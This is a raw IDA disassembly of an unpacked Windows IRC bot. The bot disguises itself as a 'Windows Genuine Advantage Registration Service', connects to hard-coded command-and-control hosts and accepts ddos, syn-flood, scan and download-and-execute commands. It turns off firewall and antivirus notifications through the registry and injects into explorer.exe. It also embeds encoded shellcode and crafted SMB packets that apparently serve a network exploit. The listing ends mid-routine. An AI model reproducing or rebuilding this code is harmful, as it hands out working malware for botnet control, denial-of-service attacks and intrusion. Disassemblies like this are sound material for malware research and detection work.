;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 33CFC3BEC7B43DD536E8476F5AEAA236
; File Name : u:\work\33cfc3bec7b43dd536e8476f5aeaa236_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00006000 ( 24576.)
; Section size in file : 00006000 ( 24576.)
; Offset to raw data for section: 00001000
; Flags C00000E0: Text Data Bss Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
MEW segment para public 'BSS' use32
assume cs:MEW
;org 401000h
assume es:nothing, ss:nothing, ds:MEW, fs:nothing, gs:nothing
dword_401000 dd 77E37D39h ; resolved to->ADVAPI32.StartServiceCtrlDispatcherA ; sub_414D29+13D�r ...
dword_401004 dd 77DEB88Ch ; resolved to->ADVAPI32.OpenServiceA ; sub_4027AF+24�r ...
dword_401008 dd 77DEADA7h ; resolved to->ADVAPI32.OpenSCManagerA ; sub_4027AF+E�r ...
dword_40100C dd 77DE5E4Dh ; resolved to->ADVAPI32.CloseServiceHandle ; sub_4027AF+42�r ...
dword_401010 dd 77E37311h ; resolved to->ADVAPI32.DeleteServicedword_401014 dd 77DEB193h ; resolved to->ADVAPI32.SetServiceStatusdword_401018 dd 77DF0953h ; resolved to->ADVAPI32.RegisterServiceCtrlHandlerAdword_40101C dd 77E36CC9h ; resolved to->ADVAPI32.ChangeServiceConfigAdword_401020 dd 77DEB635h ; resolved to->ADVAPI32.ControlServicedword_401024 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey ; sub_4034DF+E7�r ...
dword_401028 dd 77E36F61h ; resolved to->ADVAPI32.ChangeServiceConfig2A ; sub_4026D6+C4�r
dword_40102C dd 77DDEBE7h ; resolved to->ADVAPI32.RegSetValueExA ; sub_4034DF+C3�r ...
dword_401030 dd 77DFD5BBh ; resolved to->ADVAPI32.RegCreateKeyA ; sub_4034DF+A8�r ...
dword_401034 dd 77DF087Fh ; resolved to->ADVAPI32.SetSecurityInfodword_401038 dd 77DF3238h ; resolved to->ADVAPI32.StartServiceAdword_40103C dd 77E37071h ; resolved to->ADVAPI32.CreateServiceA dd 0
dword_401044 dd 7C80DDF5h ; resolved to->KERNEL32.GetCurrentProcess ; sub_4037DC+6�r
dword_401048 dd 7C81042Ch ; resolved to->KERNEL32.CreateRemoteThreaddword_40104C dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemory ; sub_4037DC+D4�r
dword_401050 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_401054 dd 7C80DDFEh ; resolved to->KERNEL32.DuplicateHandledword_401058 dd 7C831EABh ; resolved to->KERNEL32.DeleteFileAdword_40105C dd 7C809B47h ; resolved to->KERNEL32.CloseHandle ; sub_405BB6+82�r
dword_401060 dd 7C802520h ; resolved to->KERNEL32.WaitForSingleObjectdword_401064 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddress ; sub_404CE7+B3�r
dword_401068 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryA ; sub_404CE7+93�r
dword_40106C dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadId ; MEW:00403B81�r ...
dword_401070 dd 7C821363h ; resolved to->KERNEL32.GetWindowsDirectoryAdword_401074 dd 7C80BDB6h ; resolved to->KERNEL32.lstrlenAdword_401078 dd 7C82C2D3h ; resolved to->KERNEL32.GetLogicalDriveStringsAdword_40107C dd 7C80EDD7h ; resolved to->KERNEL32.FindClosedword_401080 dd 7C834EB1h ; resolved to->KERNEL32.FindNextFileAdword_401084 dd 7C8137D9h ; resolved to->KERNEL32.FindFirstFileAdword_401088 dd 7C8329D9h ; resolved to->KERNEL32.ExpandEnvironmentStringsAdword_40108C dd 7C80FC2Fh ; resolved to->KERNEL32.GlobalFreedword_401090 dd 7C80FD2Dh ; resolved to->KERNEL32.GlobalAllocdword_401094 dd 7C8608FFh ; resolved to->KERNEL32.GetTempFileNameAdword_401098 dd 7C801A24h ; resolved to->KERNEL32.CreateFileAdword_40109C dd 7C8365A5h ; resolved to->KERNEL32._lcreatdword_4010A0 dd 7C834E64h ; resolved to->KERNEL32._lclosedword_4010A4 dd 7C80929Ch ; resolved to->KERNEL32.GetTickCount ; MEW:00403AAC�r ...
dword_4010A8 dd 7C802367h ; resolved to->KERNEL32.CreateProcessA ; sub_4037DC+54�r ...
dword_4010AC dd 7C830D74h ; resolved to->KERNEL32.lstrcmpA ; sub_402C9E+C3�r ...
dword_4010B0 dd 7C813093h ; resolved to->KERNEL32.IsDebuggerPresentdword_4010B4 dd 7C810637h ; resolved to->KERNEL32.CreateThread ; sub_403A51+25�r ...
dword_4010B8 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4010BC dd 7C810111h ; resolved to->KERNEL32.lstrcpynA ; sub_4028D3+10E�r ...
dword_4010C0 dd 7C814EEAh ; resolved to->KERNEL32.GetSystemDirectoryAdword_4010C4 dd 7C812782h ; resolved to->KERNEL32.SetFileAttributesA ; sub_4034DF+286�r
dword_4010C8 dd 7C8286EEh ; resolved to->KERNEL32.CopyFileAdword_4010CC dd 7C80E93Fh ; resolved to->KERNEL32.CreateMutexAdword_4010D0 dd 7C910331h ; resolved to->NTDLL.RtlGetLastWin32Errordword_4010D4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_40284B+29�r ...
dword_4010D8 dd 7C8214E3h ; resolved to->KERNEL32.GetDriveTypeAdword_4010DC dd 7C802442h ; resolved to->KERNEL32.Sleep ; sub_402650+6E�r ...
dd 0
dword_4010E4 dd 71A6EA82h dd 0
dword_4010EC dd 7E42DE87h ; resolved to->USER32.FindWindowAdword_4010F0 dd 7E418D2Bh ; resolved to->USER32.CharUpperA ; sub_403E5B+A0�r
dword_4010F4 dd 7E43210Ah ; resolved to->USER32.FindWindowExA ; sub_40553F+84�r ...
dword_4010F8 dd 7E418A80h ; resolved to->USER32.GetWindowThreadProcessId ; sub_40553F+6D�r
dword_4010FC dd 7E42F383h ; resolved to->USER32.SendMessageA ; sub_40553F+CA�r ...
dword_401100 dd 7E43147Ah ; resolved to->USER32.GetMenudword_401104 dd 7E41A8ADh ; resolved to->USER32.wsprintfA ; sub_4028D3+123�r ...
dd 0
dword_40110C dd 71AB2B66h ; resolved to->WS2_32.ntohs ; MEW:0040464C�r ...
dword_401110 dd 71AB2C69h ; resolved to->WS2_32.sendto ; MEW:0040474F�r ...
dword_401114 dd 71AB2B66h ; resolved to->WS2_32.ntohs ; MEW:00404A77�r ...
dword_401118 dd 71AB4489h ; resolved to->WS2_32.WSAIoctldword_40111C dd 71AB2BF4h ; resolved to->WS2_32.inet_addr ; sub_40414F+10D�r ...
dword_401120 dd 71AB4FD4h ; resolved to->WS2_32.gethostbyname ; sub_402C9E+2E8�r
dword_401124 dd 71AB8769h ; resolved to->WS2_32.WSASocketA ; sub_40414F+1A6�r
dword_401128 dd 71AB3EA1h ; resolved to->WS2_32.setsockopt ; MEW:0040452C�r
dword_40112C dd 71AB406Ah ; resolved to->WS2_32.connect ; sub_403B95+1D2�r ...
dword_401130 dd 71AB428Ah ; resolved to->WS2_32.send ; sub_4028D3+144�r ...
dword_401134 dd 71AB951Eh ; resolved to->WS2_32.getsockname ; MEW:00404577�r ...
dword_401138 dd 71AB2DC0h ; resolved to->WS2_32.select ; sub_403B95+1FE�r
dword_40113C dd 71AB615Ah ; resolved to->WS2_32.recv ; MEW:004049F2�r ...
dword_401140 dd 71AB9639h ; resolved to->WS2_32.closesocket ; sub_403062+167�r ...
dword_401144 dd 71AB664Dh ; resolved to->WS2_32.WSAStartupdword_401148 dd 71AB3E00h ; resolved to->WS2_32.bind ; MEW:0040496B�r
dword_40114C dd 71AB88D3h ; resolved to->WS2_32.listendword_401150 dd 71AC1028h ; resolved to->WS2_32.acceptdword_401154 dd 71AB4519h ; resolved to->WS2_32.ioctlsocketdword_401158 dd 71AB2BC0h ; resolved to->WS2_32.ntohl ; sub_403B95+2A2�r
dword_40115C dd 71AB4544h ; resolved to->WS2_32.__WSAFDIsSetdword_401160 dd 71AB3B91h ; resolved to->WS2_32.socket ; sub_403B95+60�r ...
dword_401164 dd 71AB3F41h ; resolved to->WS2_32.inet_ntoa ; sub_403062+3A3�r ...
dd 6 dup(0)
dword_401180 dd 42h dup(0) ; sub_402650+19�o ...
dword_401288 dd 0 ; sub_402C9E+28E�r ...
dword_40128C dd 0 ; sub_4028D3+6F�r ...
dword_401290 dd 0 ; sub_4028D3+1A�w ...
word_401294 dw 0 ; DATA XREF: sub_4028D3+2A�w
; sub_4028D3+42�w ...
align 4
dword_401298 dd 80h dup(0) ; sub_4028D3+139�o ...
dword_401498 dd 4 dup(0) ; sub_402C9E+189�o ...
dword_4014A8 dd 8 dup(0) ; sub_4028D3+114�o ...
dword_4014C8 dd 0 ; sub_4028D3+133�r ...
dword_4014CC dd 0 ; sub_4044C0+3�w ...
dword_4014D0 dd 0 ; MEW:004051C7�w ...
dword_4014D4 dd 0 ; sub_403062+383�r
dword_4014D8 dd 0 ; sub_402C9E+2DC�r ...
dword_4014DC dd 0 ; sub_4028D3+C7�r ...
aCM_unpackerPac db 'C:\m_unpacker\packed.exe',0 ; DATA XREF: sub_402650+58�o
; sub_4027FE+9�o ...
align 4
dd 3Dh dup(0)
dword_4015F0 dd 0 ; sub_4037DC+37�o ...
align 10h
aD: ; DATA XREF: sub_4027FE+25�o
; sub_4027FE+2F�w ...
unicode 0, <D>,0
dd 0Ah dup(0)
dword_40162C dd 81h word_401630 dw 0 ; DATA XREF: sub_4027FE+43�w
align 4
dd 4 dup(0)
dword_401644 dd 0FF682DEBh, 68FFFFFFhdword_40164C dd 0FFFFFEFFh db 0B8h
dword_401651 dd 0FFFFFFFFh db 0FFh, 0D0h, 68h
dword_401658 dd 0FFFFFFFFh db 0B8h
dword_40165D dd 0FFFFFFFFh db 0FFh, 0D0h, 0B8h
dword_401664 dd 0FFFFFFFFh dd 6AD0FFh
db 0B8h
dword_40166D dd 0FFFFFFFFh db 0FFh, 0D0h, 0E8h
dd 0FFFFFFCEh, 0
dword_40167C dd 1 ; sub_403062+335�w ...
dword_401680 dd 1 ; sub_403A51+C�w ...
dd 1
dword_401688 dd 1 ; sub_4048CF+C�w ...
dword_40168C dd 1 ; sub_404F02+87�w ...
dword_401690 dd 401180BAh, 510B900h, 0FE80000h, 0BA000000h, 4016B7h
; DATA XREF: sub_4025E7+4�o
dd 45A5B9h, 259C6800h, 32800040h, 0FAE242B0h, 8C2h
dword_4016B8 dd 32312E25h, 255C7338h, 7334362Eh, 0aBniu_househot_ db 'bniu.househot.com',0 ; DATA XREF: sub_4028D3+E�o
; sub_4028D3:loc_402905�o
byte_4016DA db 2Eh ; DATA XREF: sub_402C9E+12C�r
; sub_402C9E+23D�r
byte_4016DB db 21h ; DATA XREF: sub_402C9E+14B�r
; sub_402C9E+25C�r
word_4016DC dw 9346h ; DATA XREF: sub_4028D3+3C�r
align 10h
aYpgw_wallloan_ db 'ypgw.wallloan.com',0 ; DATA XREF: sub_4028D3+1A�o
align 4
word_4016F4 dw 9346h ; DATA XREF: sub_4028D3+24�r
align 4
dword_4016F8 dd 316E23h ; sub_402C9E+38A�o ...
aNert4mp1 db 'nert4mp1',0 ; DATA XREF: sub_402C9E+385�o
align 4
dword_401708 dd 12Ch dword_40170C dd 2D316Eh dword_401710 dd 6461212Ah, 406E696Dh, 696D6461h, 6EhaWgareg_0 db 'wgareg',0 ; DATA XREF: sub_4025F4+9�o
align 4
aWgareg_exe db 'wgareg.exe',0 ; DATA XREF: sub_402650+14�o
align 4
aWgareg db 'wgareg',0 ; DATA XREF: MEW:004025BA�o
; sub_4026D6+1A�o ...
align 4
aWindowsGenuine db 'Windows Genuine Advantage Registration Service',0
; DATA XREF: sub_4026D6+52�o
align 10h
aEnsuresThatYou db 'Ensures that your copy of Microsoft Windows is genuine and regist'
; DATA XREF: sub_4026D6+A0�o
db 'ered. Stopping or disabling this service will result in system in'
db 'stability.',0
align 10h
aNick_24s db 'NiCK %.24s',0Ah,0 ; DATA XREF: sub_4028D3+119�o
; sub_402C9E+19E�o
aUserLLLL db 'USeR l l l l',0Ah,0 ; DATA XREF: sub_4028D3+EC�o
align 4
aPrivmsg_16s_48 db 'PRiVMSG %.16s :%.480s',0Ah,0 ; DATA XREF: sub_402C53+11�o
align 4
aJoin_16s_16s db 'JOiN %.16s %.16s',0Ah,0 ; DATA XREF: sub_402C9E+38F�o
align 4
aUserhost_16s db 'USeRHOST %.16s',0Ah,0 ; DATA XREF: sub_402C9E+354�o
a001 db '001',0 ; DATA XREF: sub_402C9E:loc_402FC4�o
a302 db '302',0 ; DATA XREF: sub_402C9E:loc_402F16�o
a332 db '332',0 ; DATA XREF: sub_402C9E:loc_402E72�o
a433 db '433',0 ; DATA XREF: sub_402C9E:loc_402E05�o
; sub_405394:loc_40544E�o
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_402C9E:loc_402D59�o
aPong_500s_0 db 'PoNG %.500s',0Dh,0Ah,0 ; DATA XREF: sub_402C9E+85�o
align 10h
aPing db 'PING',0 ; DATA XREF: sub_402C9E+70�o
; sub_405394+6A�o
align 4
aExec db '[exec] :(',0 ; DATA XREF: sub_403062:loc_403476�o
align 4
aExec_0 db '[exec] :)',0 ; DATA XREF: sub_403062+408�o
align 10h
aNi_16s_16s db '[ni] %.16s %.16s',0 ; DATA XREF: sub_403062+3B1�o
align 4
a_500s db '%.500s',0Ah,0 ; DATA XREF: sub_403062+25E�o
; sub_404FCE+17�o
aQuit db 'QUiT',0Ah,0 ; DATA XREF: sub_403062+150�o
align 4
a_8s08x db '%.8s%08x',0 ; DATA XREF: sub_4034BB+F�o
align 10h
aSharedaccess db 'sharedaccess',0 ; DATA XREF: sub_4034DF+29D�o
align 10h
aSDebugDcpromo_ db '%s\debug\dcpromo.log',0 ; DATA XREF: sub_4034DF+252�o
align 4
aSoftwarePoli_0 db 'software\policies\microsoft\windowsfirewall\standardprofile',0
; DATA XREF: sub_4034DF+205�o
aEnablefirewall db 'enablefirewall',0 ; DATA XREF: sub_4034DF+1EA�o
; sub_4034DF+222�o
align 4
aSoftwarePolici db 'software\policies\microsoft\windowsfirewall\domainprofile',0
; DATA XREF: sub_4034DF+1CD�o
align 10h
aFirewalldisa_0 db 'firewalldisableoverride',0 ; DATA XREF: sub_4034DF+1B2�o
aFirewalldisabl db 'firewalldisablenotify',0 ; DATA XREF: sub_4034DF+197�o
align 10h
aAntivirusoverr db 'antivirusoverride',0 ; DATA XREF: sub_4034DF+17C�o
align 4
aAntivirusdisab db 'antivirusdisablenotify',0 ; DATA XREF: sub_4034DF:loc_403640�o
align 4
aSoftwareMicr_0 db 'software\microsoft\security center',0 ; DATA XREF: sub_4034DF+144�o
align 10h
aAutosharewks db 'autosharewks',0 ; DATA XREF: sub_4034DF+129�o
align 10h
aAutoshareserve db 'autoshareserver',0 ; DATA XREF: sub_4034DF+10E�o
aSystemCurren_0 db 'system\currentcontrolset\services\lanmanserver\parameters',0
; DATA XREF: sub_4034DF+F1�o
align 4
aRestrictanon_0 db 'restrictanonymoussam',0 ; DATA XREF: sub_4034DF+D6�o
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_4034DF:loc_40359A�o
align 4
aSystemCurrentc db 'system\currentcontrolset\control\lsa',0 ; DATA XREF: sub_4034DF+9E�o
align 10h
aEnabledcom db 'enabledcom',0 ; DATA XREF: sub_4034DF+83�o
align 4
aSoftwareMicros db 'software\microsoft\ole',0 ; DATA XREF: sub_4034DF+6A�o
align 4
aN: ; DATA XREF: sub_4034DF+9�o
unicode 0, <n>,0
aExplorer_exe db 'explorer.exe',0 ; DATA XREF: sub_4037DC+4D�o
align 4
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_403A18+1D�o
align 10h
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_403A18+9�o
align 4
aFindfile_256s_ db '[findfile] %.256s%.240s',0 ; DATA XREF: sub_404033+D0�o
a_256s_250s db '%.256s%.250s\',0 ; DATA XREF: sub_404033+8C�o
align 4
a__ db '..',0 ; DATA XREF: sub_404033+6A�o
align 4
a_: ; DATA XREF: sub_404033+54�o
; sub_404CE7+45�o
unicode 0, <.>,0
a_256s db '%.256s*',0 ; DATA XREF: sub_404033+C�o
aComspecQ db '"%comspec%" /Q',0 ; DATA XREF: sub_40414F+221�o
align 4
aSyn_16sDoneUms db '[syn:%.16s] done [%ums] [%u packets] [%uMB] [%uK/s]',0
; DATA XREF: MEW:0040483F�o
dbl_401B88 dq 1.0e3 ; DATA XREF: MEW:00404816�r
a_16sHu_16sHu_2 db '[%.16s:%hu->%.16s:%hu] "%.256s"',0 ; DATA XREF: MEW:00404C1C�o
aJoin db 'JOIN #* *',0 ; DATA XREF: sub_404C51+53�o
align 4
aOper?? db 'OPER ?* ?* *',0 ; DATA XREF: sub_404C51+4C�o
align 4
aPass? db 'PASS ?* ',0 ; DATA XREF: sub_404C51+45�o
align 4
aUser? db 'USER ?* ',0 ; DATA XREF: sub_404C51+3E�o
align 4
a?Ddos db '* :?*ddos* *',0 ; DATA XREF: sub_404C51+37�o
align 4
a?Udp db '* :?*udp* *',0 ; DATA XREF: sub_404C51+30�o
a?Syn db '* :?*syn* *',0 ; DATA XREF: sub_404C51+29�o
a?Scan db '* :?*scan* *',0 ; DATA XREF: sub_404C51+22�o
align 4
a?set db '* :?set * * *',0 ; DATA XREF: sub_404C51+1B�o
align 4
a?login db '* :?login * *',0 ; DATA XREF: sub_404C51+14�o
align 4
aPrivmsg? db '*PRIVMSG * :?* *',0 ; DATA XREF: sub_404C51+D�o
align 10h
a_332? db '*:*.* 332 * #* :?* *',0 ; DATA XREF: sub_404C51+6�o
byte_401C65 db 3 dup(0) ; DATA XREF: sub_404CE7+40�o
aDl08xDl db '[dl:%08x] :( dl',0 ; DATA XREF: sub_404CE7+1F4�o
aDl08xExec db '[dl:%08x] :( exec',0 ; DATA XREF: sub_404CE7+1C5�o
align 4
aDl08x db '[dl:%08x] :)',0 ; DATA XREF: sub_404CE7+188�o
align 4
aDl08x_180sTo_1 db '[dl:%08x] %.180s to %.180s',0 ; DATA XREF: sub_404CE7+10F�o
align 4
aUrldownloadtof db 'URLDownloadToFileA',0 ; DATA XREF: sub_404CE7+A8�o
align 4
aUrlmon_dll db 'urlmon.dll',0 ; DATA XREF: sub_404CE7+8E�o
align 4
aNick_16s db 'NICK %.16s',0Ah,0 ; DATA XREF: MEW:00405272�o
; sub_405394+171�o
aUser_16s_16s_1 db 'USER %.16s "" "%.16s" %.16s',0Ah,0 ; DATA XREF: MEW:00405235�o
align 4
aPong_500s db 'PONG %.500s',0Dh,0Ah,0 ; DATA XREF: sub_405394+7F�o
align 4
a_oscar_tree db '_Oscar_Tree',0 ; DATA XREF: sub_40553F+9A�o
a32770 db '#32770',0 ; DATA XREF: sub_40553F+4A�o
; sub_40553F+7A�o
align 4
a_oscar_statusn db '_Oscar_StatusNotify',0 ; DATA XREF: sub_40553F+8�o
a_oscar_iconbtn db '_Oscar_IconBtn',0 ; DATA XREF: sub_405728+8A�o
align 4
aAte32class db 'Ate32Class',0 ; DATA XREF: sub_405728+5F�o
align 4
aCbclass db 'CBClass',0 ; DATA XREF: sub_405728+49�o
aWndate32class db 'WndAte32Class',0 ; DATA XREF: sub_405728+2D�o
align 10h
aAim_imessage db 'AIM_IMessage',0 ; DATA XREF: sub_405728+B�o
align 10h
aInstantMessage db 'Instant Message',0 ; DATA XREF: sub_405728:loc_40572E�o
dword_401D90 dd 0EFFFC481h, 0EB44FFFFh, 0E86BEB02h, 0FFFFFFF9h, 57565553h
; DATA XREF: sub_405AE6+61�o
dd 18246C8Bh, 8B3C458Bh, 3780554h, 184A8BD5h, 3205A8Bh
dd 4932E3DDh, 38B348Bh, 0FCFF33F5h, 3AACC033h, 0C10774C4h
dd 0F8030DCFh, 7C3BF2EBh, 0E1751424h, 3245A8Bh, 0C8B66DDh
dd 1C5A8B4Bh, 48BDD03h, 0EBC5038Bh, 5FC03302h, 895B5D5Eh
dd 8B042444h, 44892404h, 448B0824h, 0C4830424h, 6A5EC308h
dd 8B645930h, 0C5B8B19h, 8B1C5B8Bh, 87B8B1Bh, 8B1CEC83h
dd 50C033ECh, 78652E68h, 14658965h, 49EA6857h, 0D6FFE88Ah
dd 75FF066Ah, 89D0FF14h, 68570445h, 0E9238ADBh, 4589D6FFh
dd 8E68570Ch, 0FFEC0E4Eh, 66C933D6h, 516C6CB9h, 2E323368h
dd 73776864h, 0FF545F32h, 53D88BD0h, 1819B668h, 89D6FFE7h
dd 68531045h, 79C679E7h, 4589D6FFh, 6E685318h, 0FF492F0Bh
dd 6A066AD6h, 0FF026A01h, 84589D0h, 5050C033h, 0FF02B850h
dd 0F4800427h, 0C48B50FFh, 0FF50106Ah, 68530875h, 0C7701AA4h
dd 0D0FFD6FFh, 0A4685358h, 0FFE92EADh, 0FF106AD6h, 0D0FF0875h
dd 5050C033h, 530875FFh, 8649E568h, 0FFD6FF49h, 84D8BD0h
dd 51084589h, 811855FFh, 0FFFEFCC4h, 33DC8BFFh, 0FFB151C9h
dd 75FF5351h, 1055FF08h, 0A7EC085h, 75FF5350h, 0C55FF04h
dd 75FFE5EBh, 1855FF08h, 4C5B6857h, 0D6FFDD1Ah, 0FF0475FFh
dd 50C033D0h, 571475FFh, 8AFE9868h, 0FFD6FF0Eh, 0EF6857D0h
dd 0FF60E0CEh, 0D0FFD6h
dword_401F28 dd 197h ; sub_405AE6+4C�r ...
dword_401F2C dd 182h ; sub_4059EF+50�r ...
dword_401F30 dd 0EFFFC481h, 8B44FFFFh, 0EB02EBECh, 0FFF9E86Bh, 5553FFFFh
; DATA XREF: sub_4059EF+2E�o
dd 6C8B5756h, 458B1824h, 5548B3Ch, 8BD50378h, 5A8B184Ah
dd 0E3DD0320h, 348B4932h, 33F5038Bh, 0C033FCFFh, 74C43AACh
dd 0DCFC107h, 0F2EBF803h, 14247C3Bh, 5A8BE175h, 66DD0324h
dd 8B4B0C8Bh, 0DD031C5Ah, 38B048Bh, 3302EBC5h, 5D5E5FC0h
dd 2444895Bh, 24048B04h, 8244489h, 424448Bh, 0C308C483h
dd 364C033h, 408B3040h, 1C708B0Ch, 8788BADh, 50C0335Eh
dd 78652E68h, 14658965h, 49EA6857h, 0D6FFE88Ah, 75FF066Ah
dd 89D0FF14h, 68570445h, 0E9238ADBh, 4589D6FFh, 8E68570Ch
dd 0FFEC0E4Eh, 66C933D6h, 516C6CB9h, 2E323368h, 73776864h
dd 0FF545F32h, 53D88BD0h, 1819B668h, 89D6FFE7h, 68531045h
dd 79C679E7h, 4589D6FFh, 6E685318h, 0FF492F0Bh, 6A066AD6h
dd 0FF026A01h, 4589D0h, 5050C033h, 0FF02B850h, 0F4800427h
dd 0C48B50FFh, 0FF50106Ah, 68530075h, 0C7701AA4h, 0D0FFD6FFh
dd 0A4685350h, 0FFE92EADh, 75FFD6h, 5050D0FFh, 530075FFh
dd 8649E568h, 0FFD6FF49h, 4589D0h, 0FEFCC481h, 0DC8BFFFFh
dd 0B151C933h, 0FF5351FFh, 55FF0075h, 7EC08510h, 0FF53500Ah
dd 55FF0475h, 57E5EB0Ch, 1A4C5B68h, 0FFD6FFDDh, 0D0FF0475h
dd 0FF50C033h, 68571475h, 0E8AFE98h, 0D0FFD6FFh, 0CEEF6857h
dd 0D6FF60E0h, 0D0FFh, 0
dword_4020B8 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: sub_40587E+3B�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_402148 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40587E+4D�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dd 2 dup(0)
dword_4021F8 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40587E+5F�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h
dword_402224 dd 0 ; sub_415EEB+3B�w
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h
dword_4022A0 dd 300030h a02195:
unicode 0, <0 2195>,0
aW db 'W',0
aIndows20005_0:
unicode 0, <indows 2000 5.0>,0
align 8
dword_4022D8 dd 3A000000h, 424D53FFh, 75h, 20011800h, 3 dup(0)
; DATA XREF: sub_40587E+9E�o
db 2 dup(0), 0B8h
dword_4022F7 dd 3008000Ah ; sub_415EEB+29�r
db 46h
dd 0FF04h, 1000000h, 0F00h, 495C5C5Ch, 244350h, 3F3F3F3Fh
dd 3Fh
dword_402318 dd 5C000000h, 424D53FFh, 0A2h, 20011800h, 3 dup(0)
; DATA XREF: sub_40587E+AD�o
dd 4DC0800h, 400800h, 0DE00FF18h, 800DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 5C000903h, 574F5242h, 524553h, 2 dup(0)
dword_402380 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40587E+BF�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh
dd 3, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_402428 dd 66030000h, 424D53FFh, 25h, 20011800h, 3 dup(0) dd 3900800h, 3C1D0800h, 1C000010h, 0E0040003h, 0FFh, 2 dup(0)
dd 1C004A00h, 2004A03h, 2600h, 5C032340h, 45504950h, 5005Ch
dd 100300h, 31C0000h, 0
dd 3040000h, 0
dd 4221001Fh, 184E8h, 0
dd 10000h, 0
dd 1630000h, 0
dd 1630000h, 0
dword_4024B0 dd 0 dd 0D7h, 1, 0
dd 1, 0
dd 0CBh, 0
db 0
byte_4024D1 db 0 ; DATA XREF: sub_4160D2+8�w
; sub_4160D2+37�r
align 8
dword_4024D8 dd 0CA040000h, 424D53FFh, 25h, 20011800h, 3 dup(0)
; DATA XREF: sub_405AE6+E�o
dd 1C80800h, 7CC90800h, 80000010h, 0E0040004h, 0FFh, 2 dup(0)
dd 80004A00h, 2004A04h, 2600h, 5C048740h, 45504950h, 5005Ch
dd 100300h, 4800000h, 0
dd 4680000h, 0
dd 72B3001Fh, 1A381h, 0
dd 10000h, 0
dd 2150000h, 0
dd 2150000h, 0
dword_402560 dd 0 dd 85h, 2, 0
dd 2, 2EBh, 85h, 2 dup(0)
dword_402584 dd 205D655Bh, 36312E25h, 2E252073h, 7332hdword_402594 dd 6B32h dword_402598 dd 7078h ; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
and dword ptr [ebp-10h], 0
mov dword ptr [ebp-0Ch], offset loc_40288B
and dword ptr [ebp-8], 0
and dword ptr [ebp-4], 0
call sub_40284B
mov dword ptr [ebp-10h], offset aWgareg ; "wgareg"
call sub_4027FE
lea eax, [ebp-10h]
push eax
call dword_401000 ; StartServiceCtrlDispatcherA
test eax, eax
jnz short loc_4025D9
call sub_402650
loc_4025D9: ; CODE XREF: MEW:004025D2�j
call sub_4025F4
; ---------------------------------------------------------------------------
dw 4E8h
dd 33000000h
db 0C0h, 0C9h, 0C3h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4025E7 proc near
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], offset dword_401690
leave
retn
sub_4025E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4025F4 proc near ; CODE XREF: MEW:loc_4025D9�p
; MEW:004028C3�p
var_190 = byte ptr -190h
push ebp
mov ebp, esp
sub esp, 190h
push offset aWgareg_0 ; "wgareg"
push 0
push 0
call dword_4010CC ; CreateMutexA
test eax, eax
jz short loc_40261D
